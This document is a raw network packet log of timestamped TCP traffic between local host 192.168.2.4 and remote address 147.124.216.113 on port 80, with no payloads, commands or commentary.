Jan 10, 2025 08:58:57.668625116 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.668659925 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.668742895 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.668946028 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.668979883 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.669014931 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.669018030 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.669121027 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.669342995 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.669374943 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.669408083 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.669423103 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.707788944 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.707995892 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.708033085 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.708061934 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.708095074 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.708127975 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.708159924 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.708199024 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.708199024 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.708462954 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.708524942 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.708534956 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.708566904 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.708600998 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.708626986 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.708633900 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.708722115 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.709345102 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.709377050 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.709408998 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.709431887 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.709721088 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.709778070 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.709827900 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.759083033 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.759103060 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.759110928 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.759253979 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.759254932 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.759344101 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.759354115 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.759362936 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.759428024 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.759442091 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.759541035 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.759880066 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.759908915 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.759918928 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.759968996 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.760010958 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.760020971 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.760116100 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.760763884 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.760780096 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.760870934 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.760879993 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.760900021 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.760929108 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.760955095 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.761074066 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.761632919 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.761677980 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.761688948 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.761780024 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.798428059 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.798481941 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.798490047 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.798599005 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.798665047 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.798666954 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.798682928 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.798734903 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.798814058 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.798824072 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.798860073 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.798881054 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.799515963 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.799535036 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.799545050 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.799561024 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.799623013 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.799979925 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.799988985 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.799998999 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.800023079 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.800091028 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.800100088 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.800187111 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.800827026 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.800836086 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.800846100 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.800870895 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.800910950 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.800925970 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.800935984 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.801024914 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.801650047 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.801707029 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.801716089 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.801770926 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.801784039 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.801791906 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.801842928 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.838849068 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.838979959 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.839009047 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.839040995 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.841854095 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.849699974 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.849734068 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.849767923 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.849801064 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.849838972 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.849839926 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.849873066 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.849904060 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.849967957 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.849998951 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.850034952 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.850048065 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.850084066 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.850111961 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.850112915 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.850641966 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.850675106 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.850676060 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.850708961 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.850739002 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.850742102 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.850775003 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.850806952 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.850806952 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.851227045 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.851258993 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.851294041 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.851361036 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.851392031 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.851409912 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.851442099 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.851471901 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.851475000 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.851542950 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.851573944 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.851577044 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.852112055 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.852144003 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.852164030 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.852196932 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.852226973 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.889051914 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.889064074 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.889134884 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.798537016 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.798564911 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.798582077 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.798598051 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.798624039 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.798640013 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.798657894 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.798751116 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.798749924 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.798749924 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.798749924 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.798767090 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.798783064 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.798789978 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.798819065 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.799206018 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.799248934 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.799264908 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.799287081 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.799386024 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.799402952 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.799420118 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.799422979 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.799454927 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.799484015 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.799954891 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.799993992 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.800004959 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.800021887 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.800055981 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.800159931 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.800175905 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.800192118 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.800213099 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.800239086 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.800256014 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.800275087 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.800815105 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.800851107 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.800858021 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.800868988 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.800904036 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.800960064 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801034927 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801050901 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801068068 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801070929 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.801084995 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801103115 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.801692009 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801708937 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801728010 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.801863909 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801881075 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801897049 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801901102 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.801932096 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.801961899 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801979065 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.801995039 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.802012920 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.802580118 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.802597046 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.802612066 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.802613020 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.802648067 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.802711010 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.802727938 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.802761078 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.802802086 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.802818060 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.802834988 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.802850962 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.807384014 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.807437897 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.838129044 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.838176966 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.838212013 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.838236094 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.838244915 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.838289022 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:02.842770100 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:02.885818958 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.737188101 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737215996 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737266064 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.737384081 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737452984 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737484932 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.737497091 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737514019 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737545013 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.737587929 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737603903 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737632990 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.737771034 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737786055 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737801075 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737816095 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737819910 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.737832069 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737853050 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.737870932 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737904072 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.737905979 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737920046 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.737952948 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.738044977 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738059998 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738074064 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738090038 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738092899 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.738125086 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.738209963 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738250971 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738265991 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738284111 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.738341093 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738353968 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738374949 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.738472939 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738487005 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738502026 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738507986 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.738517046 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738531113 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738543034 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.738564014 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.738651991 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738943100 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.738976955 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.739006996 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739021063 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739051104 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.739119053 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739132881 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739147902 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739162922 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.739252090 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739265919 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739279032 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739286900 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.739300013 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739322901 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.739330053 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739345074 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739361048 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.739495993 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739531994 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.739900112 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739943027 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739957094 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.739974976 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.740080118 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.740093946 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.740108967 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.740114927 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.740123034 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.740144968 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.740195990 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.740231991 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.740261078 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.740276098 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.740289927 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.740303040 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.740309000 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.740330935 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.740431070 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742111921 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742125034 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742141008 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742153883 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.742171049 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.742208958 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742222071 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742259026 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.742336988 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742351055 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742364883 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742379904 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742381096 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.742393970 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742413998 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.742451906 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742485046 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.742526054 CET	80	49736	147.124.216.113	192.168.2.4
